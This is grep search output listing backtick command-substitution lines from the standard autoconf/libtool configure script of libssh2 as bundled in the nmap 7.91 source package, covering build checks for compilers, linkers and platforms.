nmap-7.91+dfsg1/libssh2/configure:1206:    ac_useropt=`$as_echo "$ac_useropt" | sed 's/[-+.]/_/g'`
nmap-7.91+dfsg1/libssh2/configure-1207-    case $ac_user_opts in
##############################################
nmap-7.91+dfsg1/libssh2/configure-1238-  *=*)
nmap-7.91+dfsg1/libssh2/configure:1239:    ac_envvar=`expr "x$ac_option" : 'x\([^=]*\)='`
nmap-7.91+dfsg1/libssh2/configure-1240-    # Reject names that are not valid shell variable names.
##############################################
nmap-7.91+dfsg1/libssh2/configure-1259-if test -n "$ac_prev"; then
nmap-7.91+dfsg1/libssh2/configure:1260:  ac_option=--`echo $ac_prev | sed 's/_/-/g'`
nmap-7.91+dfsg1/libssh2/configure-1261-  as_fn_error $? "missing argument to $ac_option"
##############################################
nmap-7.91+dfsg1/libssh2/configure-1281-    */ )
nmap-7.91+dfsg1/libssh2/configure:1282:      ac_val=`expr "X$ac_val" : 'X\(.*[^/]\)' \| "X$ac_val" : 'X\(.*\)'`
nmap-7.91+dfsg1/libssh2/configure-1283-      eval $ac_var=\$ac_val;;
##############################################
nmap-7.91+dfsg1/libssh2/configure-1316-ac_ls_di=`ls -di .` &&
nmap-7.91+dfsg1/libssh2/configure:1317:ac_pwd_ls_di=`cd "$ac_pwd" && ls -di .` ||
nmap-7.91+dfsg1/libssh2/configure-1318-  as_fn_error $? "working directory cannot be determined"
##############################################
nmap-7.91+dfsg1/libssh2/configure-1372-case $srcdir in
nmap-7.91+dfsg1/libssh2/configure:1373:*/) srcdir=`expr "X$srcdir" : 'X\(.*[^/]\)' \| "X$srcdir" : 'X\(.*\)'`;;
nmap-7.91+dfsg1/libssh2/configure-1374-esac
##############################################
nmap-7.91+dfsg1/libssh2/configure-1415-By default, \`make install' will install all the files in
nmap-7.91+dfsg1/libssh2/configure:1416:\`$ac_default_prefix/bin', \`$ac_default_prefix/lib' etc.  You can specify
nmap-7.91+dfsg1/libssh2/configure:1417:an installation prefix other than \`$ac_default_prefix' using \`--prefix',
nmap-7.91+dfsg1/libssh2/configure-1418-for instance \`--prefix=\$HOME'.
##############################################
nmap-7.91+dfsg1/libssh2/configure-1555-*)
nmap-7.91+dfsg1/libssh2/configure:1556:  ac_dir_suffix=/`$as_echo "$ac_dir" | sed 's|^\.[\\/]||'`
nmap-7.91+dfsg1/libssh2/configure-1557-  # A ".." for each directory in $ac_dir_suffix.
nmap-7.91+dfsg1/libssh2/configure:1558:  ac_top_builddir_sub=`$as_echo "$ac_dir_suffix" | sed 's|/[^\\/]*|/..|g;s|/||'`
nmap-7.91+dfsg1/libssh2/configure-1559-  case $ac_top_builddir_sub in
##############################################
nmap-7.91+dfsg1/libssh2/configure-1938-  as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack
nmap-7.91+dfsg1/libssh2/configure:1939:  as_decl_name=`echo $2|sed 's/ *(.*//'`
nmap-7.91+dfsg1/libssh2/configure:1940:  as_decl_use=`echo $2|sed -e 's/(/((/' -e 's/)/) 0&/' -e 's/,/) 0& (/g'`
nmap-7.91+dfsg1/libssh2/configure-1941-  { $as_echo "$as_me:${as_lineno-$LINENO}: checking whether $as_decl_name is declared" >&5
##############################################
nmap-7.91+dfsg1/libssh2/configure-2143-    *\'*)
nmap-7.91+dfsg1/libssh2/configure:2144:      ac_arg=`$as_echo "$ac_arg" | sed "s/'/'\\\\\\\\''/g"` ;;
nmap-7.91+dfsg1/libssh2/configure-2145-    esac
##############################################
nmap-7.91+dfsg1/libssh2/configure-2226-      case $ac_val in
nmap-7.91+dfsg1/libssh2/configure:2227:      *\'\''*) ac_val=`$as_echo "$ac_val" | sed "s/'\''/'\''\\\\\\\\'\'''\''/g"`;;
nmap-7.91+dfsg1/libssh2/configure-2228-      esac
##############################################
nmap-7.91+dfsg1/libssh2/configure-2241-	case $ac_val in
nmap-7.91+dfsg1/libssh2/configure:2242:	*\'\''*) ac_val=`$as_echo "$ac_val" | sed "s/'\''/'\''\\\\\\\\'\'''\''/g"`;;
nmap-7.91+dfsg1/libssh2/configure-2243-	esac
##############################################
nmap-7.91+dfsg1/libssh2/configure-2361-    set,)
nmap-7.91+dfsg1/libssh2/configure:2362:      { $as_echo "$as_me:${as_lineno-$LINENO}: error: \`$ac_var' was set to \`$ac_old_val' in the previous run" >&5
nmap-7.91+dfsg1/libssh2/configure:2363:$as_echo "$as_me: error: \`$ac_var' was set to \`$ac_old_val' in the previous run" >&2;}
nmap-7.91+dfsg1/libssh2/configure-2364-      ac_cache_corrupted=: ;;
##############################################
nmap-7.91+dfsg1/libssh2/configure-2372-	# differences in whitespace do not lead to failure.
nmap-7.91+dfsg1/libssh2/configure:2373:	ac_old_val_w=`echo x $ac_old_val`
nmap-7.91+dfsg1/libssh2/configure:2374:	ac_new_val_w=`echo x $ac_new_val`
nmap-7.91+dfsg1/libssh2/configure-2375-	if test "$ac_old_val_w" != "$ac_new_val_w"; then
##############################################
nmap-7.91+dfsg1/libssh2/configure-2392-    case $ac_new_val in
nmap-7.91+dfsg1/libssh2/configure:2393:    *\'*) ac_arg=$ac_var=`$as_echo "$ac_new_val" | sed "s/'/'\\\\\\\\''/g"` ;;
nmap-7.91+dfsg1/libssh2/configure-2394-    *) ac_arg=$ac_var=$ac_new_val ;;
##############################################
nmap-7.91+dfsg1/libssh2/configure-2535-
nmap-7.91+dfsg1/libssh2/configure:2536:LIBSSH2VER=`$SED -ne 's/^#define LIBSSH2_VERSION *"\(.*\)"/\1/p' ${srcdir}/include/libssh2.h`
nmap-7.91+dfsg1/libssh2/configure-2537-am__api_version='1.16'
##############################################
nmap-7.91+dfsg1/libssh2/configure-2684-     echo "timestamp, slept: $am_has_slept" > conftest.file
nmap-7.91+dfsg1/libssh2/configure:2685:     set X `ls -Lt "$srcdir/configure" conftest.file 2> /dev/null`
nmap-7.91+dfsg1/libssh2/configure-2686-     if test "$*" = "X"; then
nmap-7.91+dfsg1/libssh2/configure-2687-	# -L didn't work.
nmap-7.91+dfsg1/libssh2/configure:2688:	set X `ls -t "$srcdir/configure" conftest.file`
nmap-7.91+dfsg1/libssh2/configure-2689-     fi
##############################################
nmap-7.91+dfsg1/libssh2/configure-2735-ac_script='s/[\\$]/&&/g;s/;s,x,x,$//'
nmap-7.91+dfsg1/libssh2/configure:2736:program_transform_name=`$as_echo "$program_transform_name" | sed "$ac_script"`
nmap-7.91+dfsg1/libssh2/configure-2737-
nmap-7.91+dfsg1/libssh2/configure-2738-# Expand $ac_aux_dir to an absolute path.
nmap-7.91+dfsg1/libssh2/configure:2739:am_aux_dir=`cd "$ac_aux_dir" && pwd`
nmap-7.91+dfsg1/libssh2/configure-2740-
##############################################
nmap-7.91+dfsg1/libssh2/configure-2880-	   as_fn_executable_p "$as_dir/$ac_prog$ac_exec_ext" || continue
nmap-7.91+dfsg1/libssh2/configure:2881:	   case `"$as_dir/$ac_prog$ac_exec_ext" --version 2>&1` in #(
nmap-7.91+dfsg1/libssh2/configure-2882-	     'mkdir (GNU coreutils) '* | \
##############################################
nmap-7.91+dfsg1/libssh2/configure-2953-set x ${MAKE-make}
nmap-7.91+dfsg1/libssh2/configure:2954:ac_make=`$as_echo "$2" | sed 's/+/p/g; s/[^a-zA-Z0-9_]/_/g'`
nmap-7.91+dfsg1/libssh2/configure-2955-if eval \${ac_cv_prog_make_${ac_make}_set+:} false; then :
##############################################
nmap-7.91+dfsg1/libssh2/configure-2963-# GNU make sometimes prints "make[1]: Entering ...", which would confuse us.
nmap-7.91+dfsg1/libssh2/configure:2964:case `${MAKE-make} -f conftest.make 2>/dev/null` in
nmap-7.91+dfsg1/libssh2/configure-2965-  *@@@%%%=?*=@@@%%%*)
##############################################
nmap-7.91+dfsg1/libssh2/configure-2990-
nmap-7.91+dfsg1/libssh2/configure:2991:if test "`cd $srcdir && pwd`" != "`pwd`"; then
nmap-7.91+dfsg1/libssh2/configure-2992-  # Use -I$(srcdir) only when $(srcdir) != ., so that make's output
##############################################
nmap-7.91+dfsg1/libssh2/configure-3125-test "x$ac_build_alias" = x &&
nmap-7.91+dfsg1/libssh2/configure:3126:  ac_build_alias=`$SHELL "$ac_aux_dir/config.guess"`
nmap-7.91+dfsg1/libssh2/configure-3127-test "x$ac_build_alias" = x &&
nmap-7.91+dfsg1/libssh2/configure-3128-  as_fn_error $? "cannot guess build type; you must specify one" "$LINENO" 5
nmap-7.91+dfsg1/libssh2/configure:3129:ac_cv_build=`$SHELL "$ac_aux_dir/config.sub" $ac_build_alias` ||
nmap-7.91+dfsg1/libssh2/configure-3130-  as_fn_error $? "$SHELL $ac_aux_dir/config.sub $ac_build_alias failed" "$LINENO" 5
##############################################
nmap-7.91+dfsg1/libssh2/configure-3149-IFS=$ac_save_IFS
nmap-7.91+dfsg1/libssh2/configure:3150:case $build_os in *\ *) build_os=`echo "$build_os" | sed 's/ /-/g'`;; esac
nmap-7.91+dfsg1/libssh2/configure-3151-
##############################################
nmap-7.91+dfsg1/libssh2/configure-3160-else
nmap-7.91+dfsg1/libssh2/configure:3161:  ac_cv_host=`$SHELL "$ac_aux_dir/config.sub" $host_alias` ||
nmap-7.91+dfsg1/libssh2/configure-3162-    as_fn_error $? "$SHELL $ac_aux_dir/config.sub $host_alias failed" "$LINENO" 5
##############################################
nmap-7.91+dfsg1/libssh2/configure-3182-IFS=$ac_save_IFS
nmap-7.91+dfsg1/libssh2/configure:3183:case $host_os in *\ *) host_os=`echo "$host_os" | sed 's/ /-/g'`;; esac
nmap-7.91+dfsg1/libssh2/configure-3184-
##############################################
nmap-7.91+dfsg1/libssh2/configure-3652-$as_echo_n "checking whether the C compiler works... " >&6; }
nmap-7.91+dfsg1/libssh2/configure:3653:ac_link_default=`$as_echo "$ac_link" | sed 's/ -o *conftest[^ ]*//'`
nmap-7.91+dfsg1/libssh2/configure-3654-
##############################################
nmap-7.91+dfsg1/libssh2/configure-3696-	then :; else
nmap-7.91+dfsg1/libssh2/configure:3697:	   ac_cv_exeext=`expr "$ac_file" : '[^.]*\(\..*\)'`
nmap-7.91+dfsg1/libssh2/configure-3698-	fi
##############################################
nmap-7.91+dfsg1/libssh2/configure-3756-    *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.dSYM | *.o | *.obj ) ;;
nmap-7.91+dfsg1/libssh2/configure:3757:    *.* ) ac_cv_exeext=`expr "$ac_file" : '[^.]*\(\..*\)'`
nmap-7.91+dfsg1/libssh2/configure-3758-	  break;;
##############################################
nmap-7.91+dfsg1/libssh2/configure-3865-    *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.dSYM ) ;;
nmap-7.91+dfsg1/libssh2/configure:3866:    *) ac_cv_objext=`expr "$ac_file" : '.*\.\(.*\)'`
nmap-7.91+dfsg1/libssh2/configure-3867-       break;;
##############################################
nmap-7.91+dfsg1/libssh2/configure-4183-  if test "$am_compiler_list" = ""; then
nmap-7.91+dfsg1/libssh2/configure:4184:     am_compiler_list=`sed -n 's/^#*\([a-zA-Z0-9]*\))$/\1/p' < ./depcomp`
nmap-7.91+dfsg1/libssh2/configure-4185-  fi
##############################################
nmap-7.91+dfsg1/libssh2/configure-4440-  # Check for GNU $ac_path_GREP
nmap-7.91+dfsg1/libssh2/configure:4441:case `"$ac_path_GREP" --version 2>&1` in
nmap-7.91+dfsg1/libssh2/configure-4442-*GNU*)
##############################################
nmap-7.91+dfsg1/libssh2/configure-4506-  # Check for GNU $ac_path_EGREP
nmap-7.91+dfsg1/libssh2/configure:4507:case `"$ac_path_EGREP" --version 2>&1` in
nmap-7.91+dfsg1/libssh2/configure-4508-*GNU*)
##############################################
nmap-7.91+dfsg1/libssh2/configure-4667-do :
nmap-7.91+dfsg1/libssh2/configure:4668:  as_ac_Header=`$as_echo "ac_cv_header_$ac_header" | $as_tr_sh`
nmap-7.91+dfsg1/libssh2/configure-4669-ac_fn_c_check_header_compile "$LINENO" "$ac_header" "$as_ac_Header" "$ac_includes_default
##############################################
nmap-7.91+dfsg1/libssh2/configure-4672-  cat >>confdefs.h <<_ACEOF
nmap-7.91+dfsg1/libssh2/configure:4673:#define `$as_echo "HAVE_$ac_header" | $as_tr_cpp` 1
nmap-7.91+dfsg1/libssh2/configure-4674-_ACEOF
##############################################
nmap-7.91+dfsg1/libssh2/configure-4833-
nmap-7.91+dfsg1/libssh2/configure:4834:# Solaris has inet_addr() in -lnsl.
nmap-7.91+dfsg1/libssh2/configure-4835-{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for library containing inet_addr" >&5
##############################################
nmap-7.91+dfsg1/libssh2/configure-4849-#endif
nmap-7.91+dfsg1/libssh2/configure:4850:char inet_addr ();
nmap-7.91+dfsg1/libssh2/configure-4851-int
##############################################
nmap-7.91+dfsg1/libssh2/configure-4853-{
nmap-7.91+dfsg1/libssh2/configure:4854:return inet_addr ();
nmap-7.91+dfsg1/libssh2/configure-4855-  ;
##############################################
nmap-7.91+dfsg1/libssh2/configure-5520-  if test "$am_compiler_list" = ""; then
nmap-7.91+dfsg1/libssh2/configure:5521:     am_compiler_list=`sed -n 's/^#*\([a-zA-Z0-9]*\))$/\1/p' < ./depcomp`
nmap-7.91+dfsg1/libssh2/configure-5522-  fi
##############################################
nmap-7.91+dfsg1/libssh2/configure-5634-set x ${MAKE-make}
nmap-7.91+dfsg1/libssh2/configure:5635:ac_make=`$as_echo "$2" | sed 's/+/p/g; s/[^a-zA-Z0-9_]/_/g'`
nmap-7.91+dfsg1/libssh2/configure-5636-if eval \${ac_cv_prog_make_${ac_make}_set+:} false; then :
##############################################
nmap-7.91+dfsg1/libssh2/configure-5644-# GNU make sometimes prints "make[1]: Entering ...", which would confuse us.
nmap-7.91+dfsg1/libssh2/configure:5645:case `${MAKE-make} -f conftest.make 2>/dev/null` in
nmap-7.91+dfsg1/libssh2/configure-5646-  *@@@%%%=?*=@@@%%%*)
##############################################
nmap-7.91+dfsg1/libssh2/configure-6068-if test "X`( print -r -- -n ) 2>/dev/null`" = X-n && \
nmap-7.91+dfsg1/libssh2/configure:6069:   test "X`print -r -- $ECHO 2>/dev/null`" = "X$ECHO"; then
nmap-7.91+dfsg1/libssh2/configure-6070-  ECHO='print -r --'
nmap-7.91+dfsg1/libssh2/configure:6071:elif test "X`printf %s $ECHO 2>/dev/null`" = "X$ECHO"; then
nmap-7.91+dfsg1/libssh2/configure-6072-  ECHO='printf %s\n'
##############################################
nmap-7.91+dfsg1/libssh2/configure-6137-  # Check for GNU $ac_path_SED
nmap-7.91+dfsg1/libssh2/configure:6138:case `"$ac_path_SED" --version 2>&1` in
nmap-7.91+dfsg1/libssh2/configure-6139-*GNU*)
##############################################
nmap-7.91+dfsg1/libssh2/configure-6216-  # Check for GNU $ac_path_FGREP
nmap-7.91+dfsg1/libssh2/configure:6217:case `"$ac_path_FGREP" --version 2>&1` in
nmap-7.91+dfsg1/libssh2/configure-6218-*GNU*)
##############################################
nmap-7.91+dfsg1/libssh2/configure-6296-    # gcc leaves a trailing carriage return, which upsets mingw
nmap-7.91+dfsg1/libssh2/configure:6297:    ac_prog=`($CC -print-prog-name=ld) 2>&5 | tr -d '\015'` ;;
nmap-7.91+dfsg1/libssh2/configure-6298-  *)
nmap-7.91+dfsg1/libssh2/configure:6299:    ac_prog=`($CC -print-prog-name=ld) 2>&5` ;;
nmap-7.91+dfsg1/libssh2/configure-6300-  esac
##############################################
nmap-7.91+dfsg1/libssh2/configure-6305-      # Canonicalize the pathname of ld
nmap-7.91+dfsg1/libssh2/configure:6306:      ac_prog=`$ECHO "$ac_prog"| $SED 's%\\\\%/%g'`
nmap-7.91+dfsg1/libssh2/configure-6307-      while $ECHO "$ac_prog" | $GREP "$re_direlt" > /dev/null 2>&1; do
nmap-7.91+dfsg1/libssh2/configure:6308:	ac_prog=`$ECHO $ac_prog| $SED "s%$re_direlt%/%"`
nmap-7.91+dfsg1/libssh2/configure-6309-      done
##############################################
nmap-7.91+dfsg1/libssh2/configure-6340-      # Break only if it was the GNU/non-GNU ld that we prefer.
nmap-7.91+dfsg1/libssh2/configure:6341:      case `"$lt_cv_path_LD" -v 2>&1 </dev/null` in
nmap-7.91+dfsg1/libssh2/configure-6342-      *GNU* | *'with BFD'*)
##############################################
nmap-7.91+dfsg1/libssh2/configure-6371-  # I'd rather use --version here, but apparently some GNU lds only accept -v.
nmap-7.91+dfsg1/libssh2/configure:6372:case `$LD -v 2>&1 </dev/null` in
nmap-7.91+dfsg1/libssh2/configure-6373-*GNU* | *'with BFD'*)
##############################################
nmap-7.91+dfsg1/libssh2/configure-6421-	esac
nmap-7.91+dfsg1/libssh2/configure:6422:	case `"$tmp_nm" -B $lt_bad_file 2>&1 | sed '1q'` in
nmap-7.91+dfsg1/libssh2/configure-6423-	*$lt_bad_file* | *'Invalid file or object type'*)
##############################################
nmap-7.91+dfsg1/libssh2/configure-6427-	*)
nmap-7.91+dfsg1/libssh2/configure:6428:	  case `"$tmp_nm" -p /dev/null 2>&1 | sed '1q'` in
nmap-7.91+dfsg1/libssh2/configure-6429-	  */dev/null*)
##############################################
nmap-7.91+dfsg1/libssh2/configure-6555-
nmap-7.91+dfsg1/libssh2/configure:6556:    case `$DUMPBIN -symbols -headers /dev/null 2>&1 | sed '1q'` in
nmap-7.91+dfsg1/libssh2/configure-6557-    *COFF*)
##############################################
nmap-7.91+dfsg1/libssh2/configure-6656-    # And add a safety zone
nmap-7.91+dfsg1/libssh2/configure:6657:    lt_cv_sys_max_cmd_len=`expr $lt_cv_sys_max_cmd_len \/ 4`
nmap-7.91+dfsg1/libssh2/configure:6658:    lt_cv_sys_max_cmd_len=`expr $lt_cv_sys_max_cmd_len \* 3`
nmap-7.91+dfsg1/libssh2/configure-6659-    ;;
##############################################
nmap-7.91+dfsg1/libssh2/configure-6689-    if test -n "$kargmax"; then
nmap-7.91+dfsg1/libssh2/configure:6690:      lt_cv_sys_max_cmd_len=`echo $kargmax | sed 's/.*[	 ]//'`
nmap-7.91+dfsg1/libssh2/configure-6691-    else
##############################################
nmap-7.91+dfsg1/libssh2/configure-6698-       test undefined != "$lt_cv_sys_max_cmd_len"; then
nmap-7.91+dfsg1/libssh2/configure:6699:      lt_cv_sys_max_cmd_len=`expr $lt_cv_sys_max_cmd_len \/ 4`
nmap-7.91+dfsg1/libssh2/configure:6700:      lt_cv_sys_max_cmd_len=`expr $lt_cv_sys_max_cmd_len \* 3`
nmap-7.91+dfsg1/libssh2/configure-6701-    else
##############################################
nmap-7.91+dfsg1/libssh2/configure-6710-      # we can't tell.
nmap-7.91+dfsg1/libssh2/configure:6711:      while { test X`env echo "$teststring$teststring" 2>/dev/null` \
nmap-7.91+dfsg1/libssh2/configure-6712-	         = "X$teststring$teststring"; } >/dev/null 2>&1 &&
##############################################
nmap-7.91+dfsg1/libssh2/configure-6714-      do
nmap-7.91+dfsg1/libssh2/configure:6715:        i=`expr $i + 1`
nmap-7.91+dfsg1/libssh2/configure-6716-        teststring=$teststring$teststring
##############################################
nmap-7.91+dfsg1/libssh2/configure-6718-      # Only check the string length outside the loop.
nmap-7.91+dfsg1/libssh2/configure:6719:      lt_cv_sys_max_cmd_len=`expr "X$teststring" : ".*" 2>&1`
nmap-7.91+dfsg1/libssh2/configure-6720-      teststring=
##############################################
nmap-7.91+dfsg1/libssh2/configure-6723-      # linker.  It appears as though 1/2 is a usable value.
nmap-7.91+dfsg1/libssh2/configure:6724:      lt_cv_sys_max_cmd_len=`expr $lt_cv_sys_max_cmd_len \/ 2`
nmap-7.91+dfsg1/libssh2/configure-6725-    fi
##############################################
nmap-7.91+dfsg1/libssh2/configure-7131-openbsd* | bitrig*)
nmap-7.91+dfsg1/libssh2/configure:7132:  if test -z "`echo __ELF__ | $CC -E - | $GREP __ELF__`"; then
nmap-7.91+dfsg1/libssh2/configure-7133-    lt_cv_deplibs_check_method='match_pattern /lib[^/]+(\.so\.[0-9]+\.[0-9]+|\.so|_pic\.a)$'
##############################################
nmap-7.91+dfsg1/libssh2/configure-7201-    else
nmap-7.91+dfsg1/libssh2/configure:7202:      file_magic_glob=`echo aAbBcCdDeEfFgGhHiIjJkKlLmMnNoOpPqQrRsStTuUvVwWxXyYzZ | $SED -e "s/\(..\)/s\/[\1]\/[\1]\/g;/g"`
nmap-7.91+dfsg1/libssh2/configure-7203-    fi
##############################################
nmap-7.91+dfsg1/libssh2/configure-7343-  # decide which one to use based on capabilities of $DLLTOOL
nmap-7.91+dfsg1/libssh2/configure:7344:  case `$DLLTOOL --help 2>&1` in
nmap-7.91+dfsg1/libssh2/configure-7345-  *--identify-strict*)
##############################################
nmap-7.91+dfsg1/libssh2/configure-7864-# If we're using GNU nm, then use its standard symbol codes.
nmap-7.91+dfsg1/libssh2/configure:7865:case `$NM -V 2>&1` in
nmap-7.91+dfsg1/libssh2/configure-7866-*GNU* | *'with BFD'*)
##############################################
nmap-7.91+dfsg1/libssh2/configure-7912-mingw*)
nmap-7.91+dfsg1/libssh2/configure:7913:  opt_cr=`$ECHO 'x\{0,1\}' | tr x '\015'` # option cr in regexp
nmap-7.91+dfsg1/libssh2/configure-7914-  ;;
##############################################
nmap-7.91+dfsg1/libssh2/configure-8141-   if test yes = "$GCC"; then
nmap-7.91+dfsg1/libssh2/configure:8142:     lt_sysroot=`$CC --print-sysroot 2>/dev/null`
nmap-7.91+dfsg1/libssh2/configure-8143-   fi
##############################################
nmap-7.91+dfsg1/libssh2/configure-8145- /*)
nmap-7.91+dfsg1/libssh2/configure:8146:   lt_sysroot=`echo "$with_sysroot" | sed -e "$sed_quote_subst"`
nmap-7.91+dfsg1/libssh2/configure-8147-   ;; #(
##############################################
nmap-7.91+dfsg1/libssh2/configure-8240-    done
nmap-7.91+dfsg1/libssh2/configure:8241:    func_cc_basename_result=`$ECHO "$cc_temp" | $SED "s%.*/%%; s%^$host_alias-%%"`
nmap-7.91+dfsg1/libssh2/configure-8242-}
##############################################
nmap-7.91+dfsg1/libssh2/configure-8262-  test $ac_status = 0; }; then
nmap-7.91+dfsg1/libssh2/configure:8263:    case `/usr/bin/file conftest.$ac_objext` in
nmap-7.91+dfsg1/libssh2/configure-8264-      *ELF-32*)
##############################################
nmap-7.91+dfsg1/libssh2/configure-8283-    if test yes = "$lt_cv_prog_gnu_ld"; then
nmap-7.91+dfsg1/libssh2/configure:8284:      case `/usr/bin/file conftest.$ac_objext` in
nmap-7.91+dfsg1/libssh2/configure-8285-	*32-bit*)
##############################################
nmap-7.91+dfsg1/libssh2/configure-8295-    else
nmap-7.91+dfsg1/libssh2/configure:8296:      case `/usr/bin/file conftest.$ac_objext` in
nmap-7.91+dfsg1/libssh2/configure-8297-	*32-bit*)
##############################################
nmap-7.91+dfsg1/libssh2/configure-8321-    emul=elf
nmap-7.91+dfsg1/libssh2/configure:8322:    case `/usr/bin/file conftest.$ac_objext` in
nmap-7.91+dfsg1/libssh2/configure-8323-      *32-bit*)
##############################################
nmap-7.91+dfsg1/libssh2/configure-8329-    esac
nmap-7.91+dfsg1/libssh2/configure:8330:    case `/usr/bin/file conftest.$ac_objext` in
nmap-7.91+dfsg1/libssh2/configure-8331-      *MSB*)
##############################################
nmap-7.91+dfsg1/libssh2/configure-8337-    esac
nmap-7.91+dfsg1/libssh2/configure:8338:    case `/usr/bin/file conftest.$ac_objext` in
nmap-7.91+dfsg1/libssh2/configure-8339-      *N32*)
##############################################
nmap-7.91+dfsg1/libssh2/configure-9270-    *:)
nmap-7.91+dfsg1/libssh2/configure:9271:        eval $1=\"`$ECHO $2 | $SED 's/:/ /g'` \$$1\"
nmap-7.91+dfsg1/libssh2/configure-9272-        ;;
nmap-7.91+dfsg1/libssh2/configure-9273-    x:*)
nmap-7.91+dfsg1/libssh2/configure:9274:        eval $1=\"\$$1 `$ECHO $2 | $SED 's/:/ /g'`\"
nmap-7.91+dfsg1/libssh2/configure-9275-        ;;
nmap-7.91+dfsg1/libssh2/configure-9276-    *::*)
nmap-7.91+dfsg1/libssh2/configure:9277:        eval $1=\"\$$1\ `$ECHO $2 | $SED -e 's/.*:://' -e 's/:/ /g'`\"
nmap-7.91+dfsg1/libssh2/configure:9278:        eval $1=\"`$ECHO $2 | $SED -e 's/::.*//' -e 's/:/ /g'`\ \$$1\"
nmap-7.91+dfsg1/libssh2/configure-9279-        ;;
nmap-7.91+dfsg1/libssh2/configure-9280-    *)
nmap-7.91+dfsg1/libssh2/configure:9281:        eval $1=\"`$ECHO $2 | $SED 's/:/ /g'`\"
nmap-7.91+dfsg1/libssh2/configure-9282-        ;;
##############################################
nmap-7.91+dfsg1/libssh2/configure-9633-	"file_magic "*)
nmap-7.91+dfsg1/libssh2/configure:9634:	  file_magic_regex=`expr "$deplibs_check_method" : "file_magic \(.*\)"`
nmap-7.91+dfsg1/libssh2/configure-9635-	  MAGIC_CMD=$lt_cv_path_MAGIC_CMD
##############################################
nmap-7.91+dfsg1/libssh2/configure-9699-	"file_magic "*)
nmap-7.91+dfsg1/libssh2/configure:9700:	  file_magic_regex=`expr "$deplibs_check_method" : "file_magic \(.*\)"`
nmap-7.91+dfsg1/libssh2/configure-9701-	  MAGIC_CMD=$lt_cv_path_MAGIC_CMD
##############################################
nmap-7.91+dfsg1/libssh2/configure-10103-      *)
nmap-7.91+dfsg1/libssh2/configure:10104:	case `$CC -V 2>&1 | sed 5q` in
nmap-7.91+dfsg1/libssh2/configure-10105-	*Sun\ Ceres\ Fortran* | *Sun*Fortran*\ [1-7].* | *Sun*Fortran*\ 8.[0-3]*)
##############################################
nmap-7.91+dfsg1/libssh2/configure-10552-	# shared libraries, regardless of the interface used.
nmap-7.91+dfsg1/libssh2/configure:10553:	case `$LD -v 2>&1` in
nmap-7.91+dfsg1/libssh2/configure-10554-	  *\ \(GNU\ Binutils\)\ 2.19.5*) ;;
##############################################
nmap-7.91+dfsg1/libssh2/configure-10584-    supports_anon_versioning=no
nmap-7.91+dfsg1/libssh2/configure:10585:    case `$LD -v | $SED -e 's/(^)\+)\s\+//' 2>&1` in
nmap-7.91+dfsg1/libssh2/configure-10586-      *GNU\ gold*) supports_anon_versioning=yes ;;
##############################################
nmap-7.91+dfsg1/libssh2/configure-10653-	# is; otherwise, prepend EXPORTS...
nmap-7.91+dfsg1/libssh2/configure:10654:	archive_expsym_cmds='if   test DEF = "`$SED -n     -e '\''s/^[	 ]*//'\''     -e '\''/^\(;.*\)*$/d'\''     -e '\''s/^\(EXPORTS\|LIBRARY\)\([	 ].*\)*$/DEF/p'\''     -e q     $export_symbols`" ; then
nmap-7.91+dfsg1/libssh2/configure-10655-          cp $export_symbols $output_objdir/$soname.def;
##############################################
nmap-7.91+dfsg1/libssh2/configure-10687-	prefix_cmds="$SED"~
nmap-7.91+dfsg1/libssh2/configure:10688:	if test EXPORTS = "`$SED 1q $export_symbols`"; then
nmap-7.91+dfsg1/libssh2/configure-10689-	  prefix_cmds="$prefix_cmds -e 1d";
##############################################
nmap-7.91+dfsg1/libssh2/configure-10709-      # time.  Moving up from 0x10000000 also allows more sbrk(2) space.
nmap-7.91+dfsg1/libssh2/configure:10710:      archive_cmds='$CC -shared $pic_flag $libobjs $deplibs $compiler_flags $wl-h,$soname $wl--image-base,`expr ${RANDOM-$$} % 4096 / 2 \* 262144 + 1342177280` -o $lib'
nmap-7.91+dfsg1/libssh2/configure:10711:      archive_expsym_cmds='sed "s|^|_|" $export_symbols >$output_objdir/$soname.expsym~$CC -shared $pic_flag $libobjs $deplibs $compiler_flags $wl-h,$soname $wl--retain-symbols-file,$output_objdir/$soname.expsym $wl--image-base,`expr ${RANDOM-$$} % 4096 / 2 \* 262144 + 1342177280` -o $lib'
nmap-7.91+dfsg1/libssh2/configure-10712-      ;;
##############################################
nmap-7.91+dfsg1/libssh2/configure-10727-        pgcc*)				# Portland Group C compiler
nmap-7.91+dfsg1/libssh2/configure:10728:	  whole_archive_flag_spec='$wl--whole-archive`for conv in $convenience\"\"; do test  -n \"$conv\" && new_convenience=\"$new_convenience,$conv\"; done; func_echo_all \"$new_convenience\"` $wl--no-whole-archive'
nmap-7.91+dfsg1/libssh2/configure-10729-	  tmp_addflag=' $pic_flag'
##############################################
nmap-7.91+dfsg1/libssh2/configure-10732-					# Portland Group f77 and f90 compilers
nmap-7.91+dfsg1/libssh2/configure:10733:	  whole_archive_flag_spec='$wl--whole-archive`for conv in $convenience\"\"; do test  -n \"$conv\" && new_convenience=\"$new_convenience,$conv\"; done; func_echo_all \"$new_convenience\"` $wl--no-whole-archive'
nmap-7.91+dfsg1/libssh2/configure-10734-	  tmp_addflag=' $pic_flag -Mnomain' ;;
##############################################
nmap-7.91+dfsg1/libssh2/configure-10749-	nvcc*)	# Cuda Compiler Driver 2.2
nmap-7.91+dfsg1/libssh2/configure:10750:	  whole_archive_flag_spec='$wl--whole-archive`for conv in $convenience\"\"; do test  -n \"$conv\" && new_convenience=\"$new_convenience,$conv\"; done; func_echo_all \"$new_convenience\"` $wl--no-whole-archive'
nmap-7.91+dfsg1/libssh2/configure-10751-	  compiler_needs_object=yes
##############################################
nmap-7.91+dfsg1/libssh2/configure-10753-	esac
nmap-7.91+dfsg1/libssh2/configure:10754:	case `$CC -V 2>&1 | sed 5q` in
nmap-7.91+dfsg1/libssh2/configure-10755-	*Sun\ C*)			# Sun C 5.9
nmap-7.91+dfsg1/libssh2/configure:10756:	  whole_archive_flag_spec='$wl--whole-archive`new_convenience=; for conv in $convenience\"\"; do test -z \"$conv\" || new_convenience=\"$new_convenience,$conv\"; done; func_echo_all \"$new_convenience\"` $wl--no-whole-archive'
nmap-7.91+dfsg1/libssh2/configure-10757-	  compiler_needs_object=yes
##############################################
